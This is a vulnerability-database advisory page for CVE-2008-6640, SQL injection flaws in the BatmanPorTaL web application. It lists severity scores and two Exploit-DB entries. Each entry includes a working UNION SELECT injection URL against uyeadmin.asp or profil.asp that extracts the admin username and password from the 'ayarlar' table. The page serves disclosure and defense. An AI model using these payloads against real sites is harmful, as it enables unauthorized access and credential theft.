CVE-2008-6640
published 2009-04-07CVE-2008-6640: Multiple SQL injection vulnerabilities in BatmanPorTaL allow remote attackers to execute arbitrary SQL commands via the id parameter to (1) uyeadmin.asp and…
PriorityP339high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.97%
57.4th percentile
Multiple SQL injection vulnerabilities in BatmanPorTaL allow remote attackers to execute arbitrary SQL commands via the id parameter to (1) uyeadmin.asp and (2) profil.asp. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
BatmanPorTaL - 'uyeadmin.asp?id' SQL Injection
exploitdb·2008-05-05
CVE-2008-6640 BatmanPorTaL - 'uyeadmin.asp?id' SQL Injection
BatmanPorTaL - 'uyeadmin.asp?id' SQL Injection
---
source: https://www.securityfocus.com/bid/29057/info
BatmanPorTaL is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/lab/BatmanPorTaL/uyeadmin.asp?islem=uyeduzenle1&id=0+union+select+0,(admin_kd),2,1,(admin_pw),4,5,6,7,8,9,1,1,1,1,1,1,1,1,1,1,1+from+ayarlar
Exploit-DB
BatmanPorTaL - 'profil.asp?id' SQL Injection
exploitdb·2008-05-05
CVE-2008-6640 BatmanPorTaL - 'profil.asp?id' SQL Injection
BatmanPorTaL - 'profil.asp?id' SQL Injection
---
source: https://www.securityfocus.com/bid/29057/info
BatmanPorTaL is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/lab/BatmanPorTaL/profil.asp?id=1+union+select+0,admin_pw,admin_kd,3,4,5,6,7,8,9,1,1,1,1,1,1,1,1,1,1,1,1+from+ayarlar
No writeups or analysis indexed.
2009-04-07
Published